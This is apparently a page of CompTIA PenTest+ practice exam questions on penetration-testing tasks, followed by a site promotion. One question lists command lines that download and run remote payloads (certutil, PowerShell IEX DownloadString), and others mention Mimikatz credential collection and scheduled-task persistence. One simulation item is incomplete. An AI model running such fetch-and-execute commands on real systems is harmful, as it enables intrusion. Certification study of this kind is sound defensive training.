PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 01, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 371:

    Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

    A. Remove the persistence mechanisms.
    B. Spin down the infrastructure.
    C. Preserve artifacts.
    D. Perform secure data destruction.

  • Question 372:

    After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

    2/10/2023 05:50AM C:\users\mgranite\schtasks /query

    2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

    Which of the following best explains the team's objective?

    A. To enumerate current users
    B. To determine the users' permissions
    C. To view scheduled processes
    D. To create persistence in the network

  • Question 373:

    During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

    The tester's main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

    Which of the following steps should the tester take to complete the goal?

    A. Use Mimikatz to collect information about the accounts and try to authenticate in other systems
    B. Use Hashcat to crack a password for the local user on the compromised endpoint
    C. Use Evil-WinRM to access other systems in the network within the endpoint credentials
    D. Use Metasploit to create and execute a payload and try to upload the payload into other systems

  • Question 374:

    During reconnaissance, a penetration tester identifies that the target organization exposes a GitLab instance to the Internet. Anonymous browsing reveals project commit history that contains hardcoded API keys.

    Which technique did the tester MOST likely use?

    A. Directory fuzzing
    B. Public repository enumeration
    C. Local file inclusion
    D. DNS zone transfer

  • Question 375:

    A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools.

    Which of the following should the consultant engage first?

    A. Service discovery
    B. OS fingerprinting
    C. Host discovery
    D. DNS enumeration

  • Question 376:

    A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

    Which of the following should the tester verify FIRST to assess this risk?

    A. Whether sensitive client data is publicly accessible
    B. Whether the connection between the cloud and the client is secure
    C. Whether the client's employees are trained properly to use the platform
    D. Whether the cloud applications were developed using a secure SDLC

  • Question 377:

    A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.

    Which of the following commands should the penetration tester use?

    A. powershell.exe impo C:\tools\foo.ps1
    B. certutil.exe -f https://192.168.0.1/foo.exebad.exe
    C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
    D. rundll32.exe c:\path\foo.dll,functName

  • Question 378:

    A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster.

    Which of the following tools should the tester use to evaluate the cluster?

    A. Trivy
    B. Nessus
    C. Grype
    D. Kube-hunter

  • Question 379:

    SIMULATION

    Using the output, identify potential attack vectors that should be further investigated.

    A. See explanation below.
    B. PlaceHolder
    C. PlaceHolder
    D. PlaceHolder

  • Question 380:

    A penetration tester successfully gains access to a Linux system and then uses the following command:

    find / -type f -ls > /tmp/recon.txt

    Which of the following best describes the tester's goal?

    A. Permission enumeration
    B. Secrets enumeration
    C. User enumeration
    D. Service enumeration

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.